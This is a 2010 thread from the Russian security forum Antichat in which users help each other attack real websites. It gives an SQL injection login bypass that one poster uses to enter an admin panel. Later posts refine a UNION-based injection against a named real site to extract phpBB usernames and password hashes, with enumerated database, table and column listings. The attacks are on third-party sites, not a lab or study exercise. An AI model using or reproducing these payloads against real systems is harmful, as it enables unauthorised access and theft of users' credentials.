HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.03.2010, 10:39
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

В поле email вбей, admin' or '1'='1' --
 
Ответить с цитированием

  #2  
Старый 15.03.2010, 10:49
iGlass
Познающий
Регистрация: 14.05.2009
Сообщений: 92
Провел на форуме:
299447

Репутация: 5
По умолчанию

Выдаёт вот такую ошибку

Цитата:
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND PASSWORD =''' at line 1 SELECT * FROM admin_users WHERE USERNAME='admin' or '1'='1' --' AND PASSWORD =''
Всё получилось ))) Спасибо лови от меня +

Вот как надо было admin' or '1'='1' -- and password

И можно описание данного кода?

именно вот этого куска: admin' or '1'='1' --

Ладно в админку то я попал.. но это было не особо гланым...

Как вытащить пароль из базы?
Заранее спасибо)

Последний раз редактировалось iGlass; 15.03.2010 в 10:55..
 
Ответить с цитированием

  #3  
Старый 15.03.2010, 11:07
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от iGlass  
Выдаёт вот такую ошибку



Всё получилось ))) Спасибо лови от меня +

Вот как надо было admin' or '1'='1' -- and password

И можно описание данного кода?

именно вот этого куска: admin' or '1'='1' --

Ладно в админку то я попал.. но это было не особо гланым...

Как вытащить пароль из базы?
Заранее спасибо)
Мда, после -- пробел должен быть, в первом запросе ты его не поставил, во втором он есть, вот и сработало.
 
Ответить с цитированием

  #4  
Старый 15.03.2010, 16:44
G1G
Banned
Регистрация: 04.06.2009
Сообщений: 58
Провел на форуме:
327313

Репутация: 23
По умолчанию

Небольшой вопросик , не подкинете хороший словарик для перебора таблиц/колонок ?
 
Ответить с цитированием

  #5  
Старый 15.03.2010, 20:59
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


По умолчанию

Помогите вот с этой инъекцией:
Цитата:
http://www.bdva.ru/arhiv.phtml?id=146+and+1=0+union+select+1,2,3,user name,user_password,5,6,7,8,9,10,11+from+phpbb_user s+limit+1,1+--+
Нашел колонки из этой таблицы, ввожу, а пишет что таблицы - нет. Что не так делаю?
 
Ответить с цитированием

  #6  
Старый 15.03.2010, 21:13
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095

Репутация: 34
По умолчанию

Цитата:
Сообщение от CyberHunter  
Помогите вот с этой инъекцией:

Нашел колонки из этой таблицы, ввожу, а пишет что таблицы - нет. Что не так делаю?
Потому что находится в другой базе данных скорее всего.
 
Ответить с цитированием

  #7  
Старый 15.03.2010, 21:26
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


По умолчанию

Цитата:
Потому что находится в другой базе данных скорее всего.
А как можно поменять бд в запросе?
Вот ошибка такая:
Цитата:
Table 'bdva.phpbb_user' doesn't exist
Т.е. нет таблицы.
Что посоветуете сделать?

Если я правильно понял, то в этой таблице логины и пассы от форума, мб не та бд.
Что делать?
 
Ответить с цитированием

  #8  
Старый 15.03.2010, 21:29
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
По умолчанию

Цитата:
http://www.bdva.ru/arhiv.phtml?id=146+and+1=0+union+select+1,2,3,conc at_ws(0x3a,username,user_password),5,6,7,8,9,10,11 +from+%60bdva-forum%60.phpbb_users--+
[-_-]
 
Ответить с цитированием

  #9  
Старый 15.03.2010, 21:34
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
По умолчанию

http://www.bdva.ru/arhiv.phtml?id=-146+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11--

Version = 5.0.77-log
User = bdva_sql@78.140.133.152
Database = bdva

Код:
Database:bdva-forum

	information_schema
	bdva
	bdva-forum

Tables:phpbb_users
	phpbb_auth_access
	phpbb_banlist
	phpbb_categories
	phpbb_config
	phpbb_confirm
	phpbb_disallow
	phpbb_forum_prune
	phpbb_forums
	phpbb_groups
	phpbb_posts
	phpbb_posts_text
	phpbb_privmsgs
	phpbb_privmsgs_text
	phpbb_ranks
	phpbb_search_results
	phpbb_search_wordlist
	phpbb_search_wordmatch
	phpbb_sessions
	phpbb_sessions_keys
	phpbb_smilies
	phpbb_themes
	phpbb_themes_name
	phpbb_topics
	phpbb_topics_watch
	phpbb_user_group
	phpbb_users
	phpbb_vote_desc
	phpbb_vote_results
	phpbb_vote_voters
	phpbb_words

Columns: Table phpbb_users
	user_active
	username
	user_password
	user_session_time
	user_session_page
	user_lastvisit
	user_regdate
	user_level
	user_posts
	user_timezone
	user_style
	user_lang
	user_dateformat
	user_new_privmsg
	user_unread_privmsg
	user_last_privmsg
	user_emailtime
	user_viewemail
	user_attachsig
	user_allowhtml
	user_allowbbcode
	user_allowsmile
	user_allowavatar
	user_allow_pm
	user_allow_viewonline
	user_notify
	user_notify_pm
	user_popup_pm
	user_rank
	user_avatar
	user_avatar_type
	user_email
	user_icq
	user_website
	user_from
	user_sig
	user_sig_bbcode_uid
	user_aim
	user_yim
	user_msnm
	user_occ
	user_interests
	user_actkey
	user_newpasswd
	user_login_tries
	user_last_login_try

Последний раз редактировалось Jokester; 15.03.2010 в 22:26..
 
Ответить с цитированием

  #10  
Старый 15.03.2010, 21:39
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


По умолчанию

Спс! Все пашет!
Скажите, а как вы узнали другую бд?
И почему при "bdva-forum.phpbb_users" ошибка,
а "`bdva-forum`.phpbb_users" все ок?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.